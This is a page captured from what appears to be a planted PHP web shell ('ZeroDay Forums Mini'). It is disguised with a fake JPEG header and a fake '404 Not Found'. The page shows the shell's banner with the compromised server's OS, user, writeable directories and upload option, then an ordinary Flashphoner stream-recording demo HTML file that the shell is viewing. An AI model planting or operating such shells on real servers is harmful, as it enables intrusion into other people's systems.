����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/demo/streaming/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/demo/streaming/stream-recording.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../dependencies/bootstrap/css/bootstrap.css">
    <link rel="stylesheet" href="streaming.css">
    <title>Stream Recording Minimal</title>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-1.12.0.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-ui.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.websocket.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.json.js"></script>
    <script type="text/javascript" src="../../../dependencies/js/utils.js"></script>
    <script type="text/javascript" src="../../../Flashphoner.js"></script>
    <script>
        var record = true;
    </script>
    <script type="text/javascript" src="streaming.js"></script>
    <!-- Bootstrap JS -->
    <script src="../../../dependencies/bootstrap/js/bootstrap.js"></script>
    <script type="text/javascript" src="../../../dependencies/swf/swfobject.js"></script>
</head>
<body onload="initAPI()">
<div class="container">
    <div class="row">
        <div class="col-sm-12 text-center" style="max-width:500px">

            <h2>Stream Recording Minimal</h2>

            <fieldset id="fieldset" class="scheduler-border fp-streamingControls">

                <div class="row" style="margin-top: 20px">
                    <label class="control-label col-sm-3 fp-buttonVerticalAlign text-right" for="urlServer">WCS
                        URL</label>

                    <div class="col-sm-6">
                        <input type="text" class="form-control" id="urlServer" placeholder="WCS Server URL"/>
                    </div>
                    <div class="col-sm-3 text-left">
                        <button id="connectBtn" type="button" class="btn btn-default">Connect</button>
                    </div>
                </div>

                <div class="row">
                    <div class="col-sm-12 text-center">
                        <span id="connectionStatus"></span>
                    </div>
                </div>

                <div class="row" style="margin-top:10px;margin-bottom: 10px">
                    <div class="col-sm-12 text-center">
                        <button id="publishBtn" type="button" class="btn btn-default" style="width: 150px">Start</button>
                    </div>
                </div>

                <div class="row">
                    <div class="col-sm-12 text-center">
                        <span id="publishStatus"></span>
                    </div>
                </div>

                <div class="row" id="downloadDiv" style="margin-top: 10px">
                    <div class="col-sm-12 text-center">
                        <a id="link" href="#">Download recorded stream</a>
                    </div>
                </div>

            </fieldset>
        </div>
    </div>
    <div class="row">
        <div class="col-sm-12" style="max-width: 550px;margin-top: 20px">
            <div id="flashVideoWrapper" class="fp-flashVideoWrapper">
                <div id="flashVideoDiv"></div>
            </div>
            <video id="localVideo" width="320" height="240" autoplay class="fp-remoteVideo"></video>
            <video id="remoteVideo" style="visibility: hidden"></video>
        </div>
    </div>

    <input type="hidden" id="publishStream" value="stream"/>

</div>
</body>
</html>

ZeroDay Forums Mini